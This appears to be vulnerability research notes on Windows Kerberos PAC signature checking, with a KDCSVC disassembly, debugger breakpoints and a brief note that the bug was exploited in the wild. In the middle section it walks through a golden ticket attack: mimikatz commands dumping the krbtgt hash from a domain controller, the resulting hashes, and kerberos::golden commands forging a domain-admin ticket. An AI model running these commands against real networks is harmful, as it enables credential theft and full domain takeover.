63a91d00 8d45e8          lea     eax,[ebp-18h]
63a91d03 50              push    eax
63a91d04 8b45ac          mov     eax,dword ptr [ebp-54h]
63a91d07 ff7004          push    dword ptr [eax+4]
63a91d0a ff7008          push    dword ptr [eax+8]
63a91d0d ffd1            call    ecx
63a91d0f e97a74ffff      jmp     KDCSVC!KdcVerifyPacSignature+0x18f (63a8918e)

KDCSVC!KdcVerifyPacSignature+0x1f1:
63a91d14 f6401c40        test    byte ptr [eax+1Ch],40h
63a91d18 0f85ca74ffff    jne     KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)

KDCSVC!KdcVerifyPacSignature+0x1fb:
63a91d1e 687bffffff      push    0FFFFFF7Bh
63a91d23 ff7584          push    dword ptr [ebp-7Ch]
63a91d26 e848fefeff      call    KDCSVC!KerbGetKeyFromList (63a81b73)
63a91d2b 8bf0            mov     esi,eax
63a91d2d 85f6            test    esi,esi
63a91d2f 0f84b374ffff    je      KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)

KDCSVC!KdcVerifyPacSignature+0x212:
63a91d35 8d45b8          lea     eax,[ebp-48h]
63a91d38 50              push    eax
63a91d39 8b45a0          mov     eax,dword ptr [ebp-60h]
63a91d3c ff30            push    dword ptr [eax]
63a91d3e e86cfefeff      call    KDCSVC!CDLocateCheckSum (63a81baf)
63a91d43 85c0            test    eax,eax
63a91d45 7d0c            jge     KDCSVC!KdcVerifyPacSignature+0x230 (63a91d53)

KDCSVC!KdcVerifyPacSignature+0x224:
63a91d47 c745bc0f000000  mov     dword ptr [ebp-44h],0Fh
63a91d4e e99f74ffff      jmp     KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)

KDCSVC!KdcVerifyPacSignature+0x230:
63a91d53 8b45b8          mov     eax,dword ptr [ebp-48h]
63a91d56 8b4820          mov     ecx,dword ptr [eax+20h]
63a91d59 85c9            test    ecx,ecx
63a91d5b 7414            je      KDCSVC!KdcVerifyPacSignature+0x24e (63a91d71)

KDCSVC!KdcVerifyPacSignature+0x23a:
63a91d5d 8d45b4          lea     eax,[ebp-4Ch]
63a91d60 50              push    eax
63a91d61 6a11            push    11h
63a91d63 8d45c0          lea     eax,[ebp-40h]
63a91d66 50              push    eax
63a91d67 ff7604          push    dword ptr [esi+4]
63a91d6a ff7608          push    dword ptr [esi+8]
63a91d6d ffd1            call    ecx
63a91d6f eb0f            jmp     KDCSVC!KdcVerifyPacSignature+0x25d (63a91d80)

KDCSVC!KdcVerifyPacSignature+0x24e:
63a91d71 8d4db4          lea     ecx,[ebp-4Ch]
63a91d74 51              push    ecx
63a91d75 6a11            push    11h
63a91d77 ff7604          push    dword ptr [esi+4]
63a91d7a ff7608          push    dword ptr [esi+8]
63a91d7d ff501c          call    dword ptr [eax+1Ch]

KDCSVC!KdcVerifyPacSignature+0x25d:
63a91d80 85c0            test    eax,eax
63a91d82 7d0c            jge     KDCSVC!KdcVerifyPacSignature+0x26d (63a91d90)

KDCSVC!KdcVerifyPacSignature+0x261:
63a91d84 c745bc3c000000  mov     dword ptr [ebp-44h],3Ch
63a91d8b e96274ffff      jmp     KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)

KDCSVC!KdcVerifyPacSignature+0x26d:
63a91d90 8d45e8          lea     eax,[ebp-18h]
63a91d93 50              push    eax
63a91d94 8b45b8          mov     eax,dword ptr [ebp-48h]
63a91d97 ff7004          push    dword ptr [eax+4]
63a91d9a ff75b4          push    dword ptr [ebp-4Ch]
63a91d9d ff5010          call    dword ptr [eax+10h]
63a91da0 8d45d4          lea     eax,[ebp-2Ch]
63a91da3 50              push    eax
63a91da4 ff75b4          push    dword ptr [ebp-4Ch]
63a91da7 8b45b8          mov     eax,dword ptr [ebp-48h]
63a91daa ff5014          call    dword ptr [eax+14h]
63a91dad 8d45b4          lea     eax,[ebp-4Ch]
63a91db0 50              push    eax
63a91db1 8b45b8          mov     eax,dword ptr [ebp-48h]
63a91db4 ff5018          call    dword ptr [eax+18h]
63a91db7 8b45b8          mov     eax,dword ptr [ebp-48h]
63a91dba 8b4804          mov     ecx,dword ptr [eax+4]
63a91dbd 8b459c          mov     eax,dword ptr [ebp-64h]
63a91dc0 8b4004          mov     eax,dword ptr [eax+4]
63a91dc3 83e804          sub     eax,4
63a91dc6 3bc8            cmp     ecx,eax
63a91dc8 7510            jne     KDCSVC!KdcVerifyPacSignature+0x2b3 (63a91dda)

KDCSVC!KdcVerifyPacSignature+0x2a7:
63a91dca 8d7dc0          lea     edi,[ebp-40h]
63a91dcd 8d75d4          lea     esi,[ebp-2Ch]
63a91dd0 33c0            xor     eax,eax
63a91dd2 f3a6            repe cmps byte ptr [esi],byte ptr es:[edi]
63a91dd4 0f840e74ffff    je      KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)

KDCSVC!KdcVerifyPacSignature+0x2b3:
63a91dda 687c1ea963      push    offset KDCSVC!`string' (63a91e7c)

KDCSVC!KdcVerifyPacSignature+0x2bf:
63a91ddf 6a01            push    1
63a91de1 e89d1effff      call    KDCSVC!KDCDebugPrint (63a83c83)
63a91de6 59              pop     ecx
63a91de7 59              pop     ecx
63a91de8 c745bc29000000  mov     dword ptr [ebp-44h],29h
63a91def eb1f            jmp     KDCSVC!KdcVerifyPacSignature+0x2f4 (63a91e10)

KDCSVC!KdcVerifyPacSignature+0x2d8:
63a91df1 ff7510          push    dword ptr [ebp+10h]
63a91df4 ff75b0          push    dword ptr [ebp-50h]
63a91df7 e85a58ffff      call    KDCSVC!PAC_ReMarshal (63a87656)
63a91dfc 84c0            test    al,al
63a91dfe 0f85e473ffff    jne     KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)

KDCSVC!KdcVerifyPacSignature+0x2e7:
63a91e04 c745bc3c000000  mov     dword ptr [ebp-44h],3Ch
63a91e0b e9d873ffff      jmp     KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)

KDCSVC!KdcVerifyPacSignature+0x2f4:
63a91e10 8b75a8          mov     esi,dword ptr [ebp-58h]
63a91e13 0fb706          movzx   eax,word ptr [esi]
63a91e16 40              inc     eax
63a91e17 40              inc     eax
63a91e18 50              push    eax
63a91e19 e84301ffff      call    KDCSVC!MIDL_user_allocate (63a81f61)
63a91e1e 8bd8            mov     ebx,eax
63a91e20 85db            test    ebx,ebx
63a91e22 7416            je      KDCSVC!KdcVerifyPacSignature+0x31e (63a91e3a)

KDCSVC!KdcVerifyPacSignature+0x308:
63a91e24 0fb70e          movzx   ecx,word ptr [esi]
63a91e27 8b7604          mov     esi,dword ptr [esi+4]
63a91e2a 8bc1            mov     eax,ecx
63a91e2c c1e902          shr     ecx,2
63a91e2f 8bfb            mov     edi,ebx
63a91e31 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
63a91e33 8bc8            mov     ecx,eax
63a91e35 83e103          and     ecx,3
63a91e38 f3a4            rep movs byte ptr es:[edi],byte ptr [esi]

KDCSVC!KdcVerifyPacSignature+0x31e:
63a91e3a 53              push    ebx
63a91e3b 6a01            push    1
63a91e3d 8d45bc          lea     eax,[ebp-44h]
63a91e40 50              push    eax
63a91e41 6a04            push    4
63a91e43 68120000c0      push    0C0000012h
63a91e48 6a01            push    1
63a91e4a e8aa550000      call    KDCSVC!ReportServiceEvent (63a973f9)
63a91e4f 83c418          add     esp,18h
63a91e52 85db            test    ebx,ebx
63a91e54 0f849873ffff    je      KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)

KDCSVC!KdcVerifyPacSignature+0x33a:
63a91e5a 53              push    ebx
63a91e5b e84700ffff      call    KDCSVC!MIDL_user_free (63a81ea7)
63a91e60 e98d73ffff      jmp     KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)

KDCSVC!KdcVerifyPacSignature+0x349:
63a91e65 8b45b8          mov     eax,dword ptr [ebp-48h]
63a91e68 85c0            test    eax,eax
63a91e6a 0f848f73ffff    je      KDCSVC!KdcVerifyPacSignature+0x357 (63a891ff)

KDCSVC!KdcVerifyPacSignature+0x350:
63a91e70 8d4db4          lea     ecx,[ebp-4Ch]
63a91e73 51              push    ecx
63a91e74 ff5018          call    dword ptr [eax+18h]
63a91e77 e98373ffff      jmp     KDCSVC!KdcVerifyPacSignature+0x357 (63a891ff)

[*] Golden attack:

(1) From the AD:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : SMALLBUSINESS / S-1-5-21-1053798420-2132824579-2427655443

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    LM   :
    NTLM : 6375ac5dba2a03b83002ba6e6e96c547 <-- it is what we need!

 * WDigest
    01  bf816f365e0fac18a06269b62fdec3cd
    02  60bcd5b31db779bee316ead3f9f2bdc5
    03  052450bedad3c62b6c7ac2e0518cced6
    04  bf816f365e0fac18a06269b62fdec3cd
    05  60bcd5b31db779bee316ead3f9f2bdc5
    06  6b46611bab1bfc37642831eb4c378a3c
    07  bf816f365e0fac18a06269b62fdec3cd
    08  36d36b240d95960b3280c17f3dbdd4ef
    09  36d36b240d95960b3280c17f3dbdd4ef
    10  7700dc3feea8de94dfe42fadd189b562
    11  cf5dd5487a5bf52ddb92114e11b35258
    12  36d36b240d95960b3280c17f3dbdd4ef
    13  85c06a5e70ebb4ea9ea94ec741afc3f4
    14  cf5dd5487a5bf52ddb92114e11b35258
    15  9e215c82295f151f068a61dcfc25df79
    16  9e215c82295f151f068a61dcfc25df79
    17  2bbe05a083dd57a8db17231355da9ef5
    18  d66e91d4fcd16a0e98c16bec14676e06
    19  63381fd3a292e6d6c89ced1f6b14e580
    20  111ef3e25e5237fea3190ae4924c981c
    21  68c6af34d37db9eeed0e32540f60fe3a
    22  68c6af34d37db9eeed0e32540f60fe3a
    23  207d5247bd7dac0b5100035d0d6ffb6d
    24  5db537f6bfc59059821180dc06e18696
    25  5db537f6bfc59059821180dc06e18696
    26  f8247c1ccff30ab886e699e401c98241
    27  03ddbc3697b4eac454c5c8a5746c4165
    28  98b8c45c30f3eb9727de422e2ff11429
    29  72fed805b12f04991c8326e8664f909f

 * Kerberos
    Default Salt : SMALLBUSINESS.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 497f68d05db65be0
      des_cbc_crc       : 497f68d05db65be0

6375ac5dba2a03b83002ba6e6e96c547

(2) From the machine we’re attacking (user juan):

kerberos::golden /domain:SMALLBUSINESS.local /sid:S-1-5-21-1053798420-2132824579-2427655443 /user:juan /id:1116 /groups:513,500 /krbtgt:6375ac5dba2a03b83002ba6e6e96c547

That’s all.

I think the idea is similar to the golden attac, but hopefully we don’t need the
krbtgt key anymore. Even when I can modify the SignatureType, and create RC4
encrypted tickets with different signautres. The key is needed still to encrypt
a ticket.

So, by modifying mimikatz I can easily create different “malformed tickets”. Even
when I can switch the signature mekanism I neeed the krbtgt hash to encrypt the
TGT ticket.

(Hash for DES)

kerberos::golden /domain:SMALLBUSINESS.local /sid:S-1-5-21-1053798420-2132824579-2427655443 /user:juan /id:1116 /groups:513,500 /krbtgt:497f68d05db65be0
  • To check the signature used by ValidationInfo I’m using the next breakoint:
bp 63a89167 "r edx; dd edx L1; kb 4; g"
1
Technical Analysis

Reported as exploited in the wild as part of Google’s 2020 0day vulnerability spreadsheet they made available at https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786. Original tweet announcing this spreadsheet with the 2020 findings can be found at https://twitter.com/maddiestone/status/1329837665378725888

Technical Analysis